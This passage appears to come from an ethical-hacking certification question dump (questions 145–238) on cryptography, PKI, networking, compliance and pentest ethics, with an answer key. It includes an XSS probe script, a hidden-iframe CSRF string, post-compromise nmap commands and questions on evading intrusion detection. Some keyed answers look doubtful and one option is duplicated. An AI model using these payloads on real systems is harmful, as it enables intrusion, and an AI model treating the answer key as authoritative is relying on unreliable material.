B. Key discovery
C. Bulk data encryption
D. Key recovery

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 146
The fundamental difference between symmetric and asymmetric key cryptographic systems is that symmetric
key cryptography uses which of the following?

A. Multiple keys for non-repudiation of bulk data
B. Different keys on both ends of the transport medium
C. Bulk encryption for data transmission over fiber
D. The same key on each end of the transmission medium

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 147
An attacker sniffs encrypted traffic from the network and is subsequently able to decrypt it. The attacker can
now use which cryptanalytic technique to attempt to discover the encryption key?

A. Birthday attack
B. Plaintext attack
C. Meet in the middle attack
D. Chosen ciphertext attack

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 148
What is the primary drawback to using advanced encryption standard (AES) algorithm with a 256 bit key to
share sensitive data?

A. Due to the key size, the time it will take to encrypt and decrypt the message hinders efficient
communication.
B. To get messaging programs to function with this algorithm requires complex configurations.
C. It has been proven to be a weak cipher; therefore, should not be trusted to protect sensitive data.
D. It is a symmetric key algorithm, meaning each recipient must receive the key through a different channel
than the message.

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 149
A Certificate Authority (CA) generates a key pair that will be used for encryption and decryption of email. The
integrity of the encrypted email is dependent on the security of which of the following?

A. Public key
B. Private key
C. Modulus length
D. Email server certificate

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 150
When setting up a wireless network, an administrator enters a pre-shared key for security. Which of the
following is true?

A. The key entered is a symmetric key used to encrypt the wireless data.
B. The key entered is a hash that is used to prove the integrity of the wireless data.
C. The key entered is based on the Diffie-Hellman method.
D. The key is an RSA key used to encrypt the wireless data.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 151
An attacker has captured a target file that is encrypted with public key cryptography. Which of the attacks below
is likely to be used to crack the target file?

A. Timing attack
B. Replay attack
C. Memory trade-off attack
D. Chosen plain-text attack

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 152
Which of the following processes of PKI (Public Key Infrastructure) ensures that a trust relationship exists and
that a certificate is still valid for specific operations?

A. Certificate issuance
B. Certificate validation
C. Certificate cryptography
D. Certificate revocation

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 153
Which of the following describes a component of Public Key Infrastructure (PKI) where a copy of a private key
is stored to provide third-party access and to facilitate recovery operations?

A. Key registry
B. Recovery agent
C. Directory
D. Key escrow

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 154
To reduce the attack surface of a system, administrators should perform which of the following processes to
remove unnecessary software, services, and insecure configuration settings?

A. Harvesting
B. Windowing
C. Hardening
D. Stealthing

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 155
Which of the following is a common Service Oriented Architecture (SOA) vulnerability?

A. Cross-site scripting
B. SQL injection
C. VPath injection
D. XML denial of service issues

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 156
The intrusion detection system at a software development company suddenly generates multiple alerts
regarding attacks against the company's external web server, VPN concentrator, and DNS servers. What should
the security team do to determine which alerts to check first?

A. Investigate based on the maintenance schedule of the affected systems.
B. Investigate based on the service level agreements of the systems.
C. Investigate based on the potential effect of the incident.
D. Investigate based on the order that the alerts arrived in.

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 157
An IT security engineer notices that the company's web server is currently being hacked. What should the
engineer do next?

A. Unplug the network connection on the company's web server.
B. Determine the origin of the attack and launch a counterattack.
C. Record as much information as possible from the attack.
D. Perform a system restart on the company's web server.

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 158
Which of the following is a primary service of the U.S. Computer Security Incident Response Team (CSIRT)?

A. CSIRT provides an incident response service to enable a reliable and trusted single point of contact for
reporting computer security incidents worldwide.
B. CSIRT provides a computer security surveillance service to supply a government with important intelligence
information on individuals travelling abroad.
C. CSIRT provides a penetration testing service to support exception reporting on incidents worldwide by
individuals and multi-national corporations.
D. CSIRT provides a vulnerability assessment service to assist law enforcement agencies with profiling an
individual's property or company's asset.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 159
Which of the following items is unique to the N-tier architecture method of designing software applications?

A. Application layers can be separated, allowing each layer to be upgraded independently from other layers.
B. It is compatible with various databases including Access, Oracle, and SQL.
C. Data security is tied into each layer and must be updated for all layers when any upgrade is performed.
D. Application layers can be written in C, ASP.NET, or Delphi without any performance loss.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 160
If a tester is attempting to ping a target that exists but receives no response or a response that states the
destination is unreachable, ICMP may be disabled and the network may be using TCP. Which other option
could the tester use to get a response from a host using TCP?

A. Hping
B. Traceroute
C. TCP ping
D. Broadcast ping

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 161
Which of the following descriptions is true about a static NAT?

A. A static NAT uses a many-to-many mapping.
B. A static NAT uses a one-to-many mapping.
C. A static NAT uses a many-to-one mapping.
D. A static NAT uses a one-to-one mapping.

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 162
Which of the following network attacks takes advantage of weaknesses in the fragment reassembly
functionality of the TCP/IP protocol stack?

A. Teardrop
B. SYN flood
C. Smurf attack
D. Ping of death

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 163
Employees in a company are no longer able to access Internet web sites on their computers. The network
administrator is able to successfully ping IP addresses of web servers on the Internet and is able to open web sites
by using an IP address in place of the URL. The administrator runs the nslookup command for
www.eccouncil.org and receives an error message stating there is no response from the server. What should
the administrator do next?

A. Configure the firewall to allow traffic on TCP ports 53 and UDP port 53.
B. Configure the firewall to allow traffic on TCP ports 80 and UDP port 443.
C. Configure the firewall to allow traffic on TCP port 53.
D. Configure the firewall to allow traffic on TCP port 8080.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 164
While testing the company's web applications, a tester attempts to insert the following test script into the search
area on the company's web site:

<script>alert(" Testing Testing Testing ")</script>

Afterwards, when the tester presses the search button, a pop-up box appears on the screen with the text:
"Testing Testing Testing". Which vulnerability has been detected in the web application?

A. Buffer overflow
B. Cross-site request forgery
C. Distributed denial of service
D. Cross-site scripting

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 165
Which of the following is an advantage of utilizing security testing methodologies to conduct a security audit?

A. They provide a repeatable framework.
B. Anyone can run the command line scripts.
C. They are available at low cost.
D. They are subject to government regulation.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 166
The Open Web Application Security Project (OWASP) testing methodology addresses the need to secure web
applications by providing which one of the following services?

A. An extensible security framework named COBIT
B. A list of flaws and how to fix them
C. Web application patches
D. A security certification for hardened web applications

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 167
In the OSI model, where does PPTP encryption take place?

A. Transport layer
B. Application layer
C. Data link layer
D. Network layer

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 168
Which of the following is an example of IP spoofing?

A. SQL injections
B. Man-in-the-middle
C. Cross-site scripting
D. ARP poisoning

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 169
For messages sent through an insecure channel, a properly implemented digital signature gives the receiver
reason to believe the message was sent by the claimed sender. While using a digital signature, the message
digest is encrypted with which key?

A. Sender's public key
B. Receiver's private key
C. Receiver's public key
D. Sender's private key

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 170
Some passwords are stored using specialized encryption algorithms known as hashes. Why is this an
appropriate method?

A. It is impossible to crack hashed user passwords unless the key used to encrypt them is obtained.
B. If a user forgets the password, it can be easily retrieved using the hash key stored by administrators.
C. Hashing is faster compared to more traditional encryption algorithms.
D. Passwords stored using hashes are non-reversible, making finding the password much more difficult.

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 171
Company A and Company B have just merged and each has its own Public Key Infrastructure (PKI). What
must the Certificate Authorities (CAs) establish so that the private PKIs for Company A and Company B trust
one another and each private PKI can validate digital certificates from the other company?

A. Poly key exchange
B. Cross certification
C. Poly key reference
D. Cross-site exchange

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 172
Which of the following defines the role of a root Certificate Authority (CA) in a Public Key Infrastructure (PKI)?

A. The root CA is the recovery agent used to encrypt data when a user's certificate is lost.
B. The root CA stores the user's hash value for safekeeping.
C. The CA is the trusted root that issues certificates.
D. The root CA is used to encrypt email messages to prevent unintended disclosure of data.

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 173
A network security administrator is worried about potential man-in-the-middle attacks when users access a
corporate web site from their workstations. Which of the following is the best remediation against this type of
attack?

A. Implementing server-side PKI certificates for all connections
B. Mandating only client-side PKI certificates for all connections
C. Requiring client and server PKI certificates for all connections
D. Requiring strong authentication for all DNS queries
D. Requiring strong authentication for all DNS queries

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 174
Which of the following levels of algorithms does Public Key Infrastructure (PKI) use?

A. RSA 1024 bit strength
B. AES 1024 bit strength
C. RSA 512 bit strength
D. AES 512 bit strength

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 175
Which of the following is a characteristic of Public Key Infrastructure (PKI)?

A. Public-key cryptosystems are faster than symmetric-key cryptosystems.
B. Public-key cryptosystems distribute public-keys within digital signatures.
C. Public-key cryptosystems do not require a secure key distribution channel.
D. Public-key cryptosystems do not provide technical non-repudiation via digital signatures.

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 176
Which security strategy requires using several, varying methods to protect IT systems against attacks?

A. Defense in depth
B. Three-way handshake
C. Covert channels
D. Exponential backoff algorithm

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 177
SOAP services use which technology to format information?

A. SATA
B. PCI
C. XML
D. ISDN

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 178
Which statement best describes a server type under an N-tier architecture?

A. A group of servers at a specific layer
B. A single server with a specific role
C. A group of servers with a unique role
D. A single server at a specific layer

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 179
If an e-commerce site was put into a live environment and the programmers failed to remove the secret entry
point that was used during the application development, what is this secret entry point known as?

A. SDLC process
B. Honey pot
C. SQL injection
D. Trap door

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 180
A technician is resolving an issue where a computer is unable to connect to the Internet using a wireless
access point. The computer is able to transfer files locally to other machines, but cannot successfully reach the
Internet. When the technician examines the IP address and default gateway, they are both on the
192.168.1.0/24 network. Which of the following has occurred?

A. The gateway is not routing to a public IP address.
B. The computer is using an invalid IP address.
C. The gateway and the computer are not on the same network.
D. The computer is not using a private IP address.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 181
Which of the following network attacks relies on sending an abnormally large packet size that exceeds TCP/IP
specifications?

A. Ping of death
B. SYN flooding
C. TCP hijacking
D. Smurf attack

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 182
Which NMAP feature can a tester implement or adjust while scanning for open ports to avoid detection by the
network's IDS?

A. Timing options to slow the speed that the port scan is conducted
B. Fingerprinting to identify which operating systems are running on the network
C. ICMP ping sweep to determine which hosts on the network are not available
D. Traceroute to control the path of the packets sent during the scan

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 183
When comparing the testing methodologies of Open Web Application Security Project (OWASP) and Open
Source Security Testing Methodology Manual (OSSTMM) the main difference is

A. OWASP is for web applications and OSSTMM does not include web applications.
B. OSSTMM is gray box testing and OWASP is black box testing.
C. OWASP addresses controls and OSSTMM does not.
D. OSSTMM addresses controls and OWASP does not.

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 184
Which Open Web Application Security Project (OWASP) implements a web application full of known
vulnerabilities?

A. WebBugs
B. WebGoat
C. VULN_HTML
D. WebScarab

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 185
What are the three types of compliance that the Open Source Security Testing Methodology Manual
(OSSTMM) recognizes?

A. Legal, performance, audit
B. Audit, standards based, regulatory
C. Contractual, regulatory, industry
D. Legislative, contractual, standards based

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 186
Which of the following algorithms provides better protection against brute force attacks by using a 160-bit
message digest?

A. MD5
B. SHA-1
C. RC4
D. MD4

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 187
Which cipher encrypts the plain text digit (bit or byte) one by one?

A. Classical cipher
B. Block cipher
C. Modern cipher
D. Stream cipher

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 188
Which of the following can take an arbitrary length of input and produce a message digest output of 160 bit?

A. SHA-1
B. MD5
C. HAVAL
D. MD4

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 189
Which element of Public Key Infrastructure (PKI) verifies the applicant?

A. Certificate authority
B. Validation authority
C. Registration authority
D. Verification authority

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 190
Which vital role does the U.S. Computer Security Incident Response Team (CSIRT) provide?

A. Incident response services to any user, company, government agency, or organization in partnership with
the Department of Homeland Security
B. Maintenance of the nation's Internet infrastructure, builds out new Internet infrastructure, and
decommissions old Internet infrastructure
C. Registration of critical penetration testing for the Department of Homeland Security and public and private
sectors
D. Measurement of key vulnerability assessments on behalf of the Department of Defense (DOD) and State
Department, as well as private sectors

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 191
How do employers protect assets with security policies pertaining to employee surveillance activities?

A. Employers promote monitoring activities of employees as long as the employees demonstrate
trustworthiness.
B. Employers use informal verbal communication channels to explain employee monitoring activities to
employees.
C. Employers use network surveillance to monitor employee email traffic, network access, and to record
employee keystrokes.
D. Employers provide employees written statements that clearly discuss the boundaries of monitoring activities
and consequences.

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 192
Which of the following ensures that updates to policies, procedures, and configurations are made in a
controlled and documented fashion?

A. Regulatory compliance
B. Peer review
C. Change management
D. Penetration testing

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 193
Which of the following tools would be the best choice for achieving compliance with PCI Requirement 11?

A. Truecrypt
B. Sub7
C. Nessus
D. Clamwin

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 194
When does the Payment Card Industry Data Security Standard (PCI-DSS) require organizations to perform
external and internal penetration testing?

A. At least once a year and after any significant upgrade or modification
B. At least once every three years or after any significant upgrade or modification
C. At least twice a year or after any significant upgrade or modification
D. At least once every two years and after any significant upgrade or modification

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 195
Which United States legislation mandates that the Chief Executive Officer (CEO) and the Chief Financial
Officer (CFO) must sign statements verifying the completeness and accuracy of financial reports?

A. Sarbanes-Oxley Act (SOX)
B. Gramm-Leach-Bliley Act (GLBA)
C. Fair and Accurate Credit Transactions Act (FACTA)
D. Federal Information Security Management Act (FISMA)

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 196
How can a policy help improve an employee's security awareness?

A. By implementing written security procedures, enabling employee security training, and promoting the
benefits of security
B. By using informal networks of communication, establishing secret passing procedures, and immediately
terminating employees
C. By sharing security secrets with employees, enabling employees to share secrets, and establishing a
consultative help line
D. By decreasing an employee's vacation time, addressing ad-hoc employment clauses, and ensuring that
managers know employee strengths

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 197
Which method can provide a better return on IT security investment and provide a thorough and
comprehensive assessment of organizational security covering policy, procedure design, and implementation?

A. Penetration testing
B. Social engineering
C. Vulnerability scanning
D. Access control list reviews

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 198
Which of the following guidelines or standards is associated with the credit card industry?

A. Control Objectives for Information and Related Technology (COBIT)
B. Sarbanes-Oxley Act (SOX)
C. Health Insurance Portability and Accountability Act (HIPAA)
D. Payment Card Industry Data Security Standards (PCI DSS)

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 199
International Organization for Standardization (ISO) standard 27002 provides guidance for compliance by
outlining

A. guidelines and practices for security controls.
B. financial soundness and business viability metrics.
C. standard best practice for configuration management.
D. contract agreement writing standards.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 200
Which type of security document is written with specific step-by-step details?

A. Process
B. Procedure
C. Policy
D. Paradigm

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 201
An ethical hacker for a large security research firm performs penetration tests, vulnerability tests, and risk
assessments. A friend recently started a company and asks the hacker to perform a penetration test and
vulnerability assessment of the new company as a favor. What should the hacker's next step be before starting
work on this job?

A. Start by footprinting the network and mapping out a plan of attack.
B. Ask the employer for authorization to perform the work outside the company.
C. Begin the reconnaissance phase with passive information gathering and then move into active information
gathering.
D. Use social engineering techniques on the friend's employees to help identify areas that may be susceptible
to attack.

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 202
A certified ethical hacker (CEH) completed a penetration test of the main headquarters of a company almost
two months ago, but has yet to get paid. The customer is suffering from financial problems, and the CEH is
worried that the company will go out of business and end up not paying. What actions should the CEH take?

A. Threaten to publish the penetration test results if not paid.
B. Follow proper legal procedures against the company to request payment.
C. Tell other customers of the financial problems with payments from this company.
D. Exploit some of the vulnerabilities found on the company webserver to deface it.

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 203
Which initial procedure should an ethical hacker perform after being brought into an organization?

A. Begin security testing.
B. Turn over deliverables.
C. Sign a formal contract with non-disclosure.
D. Assess what the organization is trying to protect.

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 204
A consultant has been hired by the V.P. of a large financial organization to assess the company's security
posture. During the security testing, the consultant comes across child pornography on the V.P.'s computer.
What is the consultant's obligation to the financial organization?

A. Say nothing and continue with the security testing.
B. Stop work immediately and contact the authorities.
C. Delete the pornography, say nothing, and continue security testing.
D. Bring the discovery to the financial organization's human resource department.

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 205
A computer technician is using a new version of a word processing software package when it is discovered that
a special sequence of characters causes the entirecomputer to crash. The technician researches the bug and
discovers that no one else experienced the problem. What is the appropriate next step?

A. Ignore the problem completely and let someone else deal with it.
B. Create a document that will crash the computer when opened and send it to friends.
C. Find an underground bulletin board and attempt to sell the bug to the highest bidder.
D. Notify the vendor of the bug and do not disclose it until the vendor gets a chance to issue a fix.

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 206
A certified ethical hacker (CEH) is approached by a friend who believes her husband is cheating. She offers to
pay to break into her husband's email account inorder to find proof so she can take him to court. What is the
ethical response?

A. Say no; the friend is not the owner of the account.
B. Say yes; the friend needs help to gather evidence.
C. Say yes; do the job for free.
D. Say no; make sure that the friend knows the risk she's asking the CEH to take.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 207
It is an entity or event with the potential to adversely impact a system through unauthorized access, destruction,
disclosure, denial of service or modification of data.
Which of the following terms best matches the definition?

A. Threat
B. Attack
C. Vulnerability
D. Risk

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 208
As a Certified Ethical Hacker, you were contracted by a private firm to conduct an external security assessment
through penetration testing.

What document describes the specifics of the testing, the associated violations, and essentially protects both
the organization's interest and your liabilities as a tester?

A. Terms of Engagement
B. Project Scope
C. Non-Disclosure Agreement
D. Service Level Agreement

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 209
Initiating an attack against targeted businesses and organizations, threat actors compromise a carefully
selected website by inserting an exploit resulting in malware infection. The attackers run exploits on well-known
and trusted sites likely to be visited by their targeted victims. Aside from carefully choosing sites to compromise,
these attacks are known to incorporate zero-day exploits that target unpatched vulnerabilities. Thus, the
targeted entities are left with little or no defense against these exploits.

What type of attack is outlined in the scenario?

A. Watering Hole Attack
B. Heartbleed Attack
C. Shellshock Attack
D. Spear Phishing Attack

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 210
You have successfully gained access to your client's internal network and successfully compromised a Linux
server which is part of the internal IP network. You want to know which Microsoft Windows workstations have
file sharing enabled.

Which port would you see listening on these Windows machines in the network?

A. 445
B. 3389
C. 161
D. 1433

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 211
It is a short-range wireless communication technology intended to replace the cables connecting portable or
fixed devices while maintaining high levels of security. It allows mobile phones, computers and other devices to
connect and communicate using a short-range wireless connection.

Which of the following terms best matches the definition?

A. Bluetooth
B. Radio-Frequency Identification
C. WLAN
D. InfraRed

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 212
A hacker has successfully infected an internet-facing server which he will then use to send junk mail, take part
in coordinated attacks, or host junk email content.

Which sort of trojan infects this server?

A. Botnet Trojan
B. Turtle Trojans
C. Banking Trojans
D. Ransomware Trojans

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 213
You have compromised a server and successfully gained root access. You want to pivot and pass traffic
undetected over the network and evade any possible Intrusion Detection System.

What is the best approach?

A. Install Cryptcat and encrypt outgoing packets from this server.


B. Install and use Telnet to encrypt all outgoing traffic from this server.
C. Use Alternate Data Streams to hide the outgoing packets from this server.
D. Use HTTP so that all traffic can be routed via a browser, thus evading the internal Intrusion Detection
Systems.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 214
It is a kind of malware (malicious software) that criminals install on your computer so they can lock it from a
remote location. This malware generates a pop-up window, webpage, or email warning from what looks like an
official authority. It explains that your computer has been locked because of possible illegal activities on it and
demands payment before you can access your files and programs again.

Which of the following terms best matches the definition?

A. Ransomware
B. Adware
C. Spyware
D. Riskware

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 215
You have successfully compromised a server having an IP address of 10.10.0.5. You would like to enumerate all
machines in the same network quickly.

What is the best nmap command you will use?

A. nmap -T4 -F 10.10.0.0/24
B. nmap -T4 -r 10.10.1.0/24
C. nmap -T4 -O 10.10.0.0/24
D. nmap -T4 -q 10.10.0.0/24

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 216
You have compromised a server on a network and successfully opened a shell. You aimed to identify all
operating systems running on the network. However, as you attempt to fingerprint all machines in the network
using the nmap syntax below, it is not going through.
invictus@victim_server:~$ nmap -T4 -O 10.10.0.0/24
TCP/IP fingerprinting (for OS scan) xxxxxxx xxxxxx xxxxxxxxx.
QUITTING!

What seems to be wrong?

A. OS Scan requires root privileges.
B. The nmap syntax is wrong.
C. This is a common behavior for a corrupted nmap application.
D. The outgoing TCP/IP fingerprinting is blocked by the host firewall.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 217
Which of the following statements is TRUE?

A. Sniffers operate on Layer 2 of the OSI model.
B. Sniffers operate on Layer 3 of the OSI model.
C. Sniffers operate on both Layer 2 & Layer 3 of the OSI model.
D. Sniffers operate on the Layer 1 of the OSI model.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 218
You are logged in as a local admin on a Windows 7 system and you need to launch the Computer Management
Console from the command line. Which command would you use?

A. c:\compmgmt.msc
B. c:\services.msc
C. c:\ncpa.cp
D. c:\gpedit

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 219
What is the best description of SQL Injection?

A. It is an attack used to gain unauthorized access to a database.
B. It is an attack used to modify code in an application.
C. It is a Man-in-the-Middle attack between your SQL Server and Web App Server.
D. It is a Denial of Service Attack.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 220
Which of the following is the BEST way to defend against network sniffing?

A. Using encryption protocols to secure network communications
B. Register all machines MAC Address in a Centralized Database
C. Restrict Physical Access to Server Rooms hosting Critical Servers
D. Use Static IP Address

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 221
You have successfully gained access to a Linux server and would like to ensure that subsequent outgoing
traffic from this server will not be caught by a Network-Based Intrusion Detection System (NIDS).

What is the best way to evade the NIDS?

A. Encryption
B. Protocol Isolation
C. Alternate Data Streams
D. Out of band signalling

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 222
You just set up a security system in your network. In what kind of system would you find the following string of
characters used as a rule within its configuration?

alert tcp any any -> 192.168.100.0/24 21 (msg: "FTP on the network!";)

A. An Intrusion Detection System
B. A firewall IPTable
C. A Router IPTable
D. FTP Server rule

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 223
What is the benefit of performing an unannounced Penetration Testing?

A. The tester will have an actual security posture visibility of the target network.
B. Network security would be in a "best state" posture.
C. It is best to catch critical infrastructure unpatched.
D. The tester could not provide an honest analysis.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 224
You have successfully compromised a machine on the network and found a server that is alive on the same
network. You tried to ping it but you didn't get any response back.

What is happening?

A. ICMP could be disabled on the target server.
B. The ARP is disabled on the target server.
C. TCP/IP doesn't support ICMP.
D. You need to run the ping command with root privileges.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 225
Under the "Post-attack Phase and Activities", it is the responsibility of the tester to restore the systems to a
pre-test state. Which of the following activities should not be included in this phase? (see exhibit)

Exhibit:

A. III
B. IV
C. III and IV
D. All should be included.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 226
It is a regulation that has a set of guidelines, which should be adhered to by anyone who handles any electronic
medical data. These guidelines stipulate that all medical practices must ensure that all necessary measures are
in place while saving, accessing, and sharing any electronic medical data to keep patient data secure.

Which of the following regulations best matches the description?

A. HIPAA
B. ISO/IEC 27002
C. COBIT
D. FISMA

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 227
Which of the following is a component of a risk assessment?

A. Administrative safeguards
B. Physical security
C. DMZ
D. Logical interface

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 228
A medium-sized healthcare IT business decides to implement a risk management strategy. Which of the
following is NOT one of the five basic responses to risk?

A. Delegate
B. Avoid
C. Mitigate
D. Accept

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 229
Your company was hired by a small healthcare provider to perform a technical assessment on the network.

What is the best approach for discovering vulnerabilities on a Windows-based computer?

A. Use a scan tool like Nessus
B. Use the built-in Windows Update tool
C. Check MITRE.org for the latest list of CVE findings
D. Create a disk image of a clean Windows installation

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 230
Nation-state threat actors often discover vulnerabilities and hold on to them until they want to launch a
sophisticated attack. The Stuxnet attack was an unprecedented style of attack because it used four types of
vulnerability.

What is this style of attack called?

A. zero-day
B. zero-hour
C. zero-sum
D. no-day

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 231
An attacker changes the profile information of a particular user (victim) on the target website. The attacker uses
this string to update the victim's profile to a text file and then submit the data to the attacker's database.

<iframe src="http://www.vulnweb.com/updateif.php" style="display:none"></iframe>

What is this type of attack (that can use either HTTP GET or HTTP POST) called?

A. Cross-Site Request Forgery
B. Cross-Site Scripting
C. SQL Injection
D. Browser Hacking

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 232
It is a vulnerability in GNU's bash shell, discovered in September of 2014, that gives attackers access to run
remote commands on a vulnerable system. The malicious software can take control of an infected machine,
launch denial-of-service attacks to disrupt websites, and scan for other vulnerable devices (including routers).

Which of the following vulnerabilities is being described?

A. Shellshock
B. Rootshock
C. Rootshell
D. Shellbash

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 233
When you return to your desk after a lunch break, you notice a strange email in your inbox. The sender is
someone you did business with recently, but the subject line has strange characters in it.

What should you do?

A. Forward the message to your company's security response team and permanently delete the message from
your computer.
B. Reply to the sender and ask them for more information about the message contents.
C. Delete the email and pretend nothing happened
D. Forward the message to your supervisor and ask for her opinion on how to handle the situation

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 234
The network administrator contacts you and tells you that she noticed the temperature on the internal wireless
router increases by more than 20% during weekend hours when the office was closed. She asks you to
investigate the issue because she is busy dealing with a big conference and doesn't have time to perform the
task.

What tool can you use to view the network traffic being sent and received by the wireless router?

A. Wireshark
B. Nessus
C. Netcat
D. Netstat

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 235
A regional bank hires your company to perform a security assessment on their network after a recent data
breach. The attacker was able to steal financial data from the bank by compromising only a single server.

Based on this information, what should be one of your key recommendations to the bank?

A. Place a front-end web server in a demilitarized zone that only handles external web traffic
B. Require all employees to change their passwords immediately
C. Move the financial data to another server on the same IP subnet
D. Issue new certificates to the web servers from the root certificate authority

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 236
Port scanning can be used as part of a technical assessment to determine network vulnerabilities. The TCP
XMAS scan is used to identify listening ports on the targeted system.

If a scanned port is open, what happens?

A. The port will ignore the packets.
B. The port will send an RST.
C. The port will send an ACK.
D. The port will send a SYN.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 237
During a recent security assessment, you discover the organization has one Domain Name Server (DNS) in a
Demilitarized Zone (DMZ) and a second DNS server on the internal network.

What is this type of DNS configuration commonly called?

A. Split DNS
B. DNSSEC
C. DynDNS
D. DNS Scheme

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 238
This tool is an 802.11 WEP and WPA-PSK key cracking program that can recover keys once enough data
packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK
attacks, as well as the PTW attack, thus making the attack much faster compared to other WEP cracking tools.

Which of the following tools is being described?

A. Aircrack-ng
B. Airguard
C. WLAN-crack
D. wificracker

Correct Answer: A
Section: (none)
Explanation
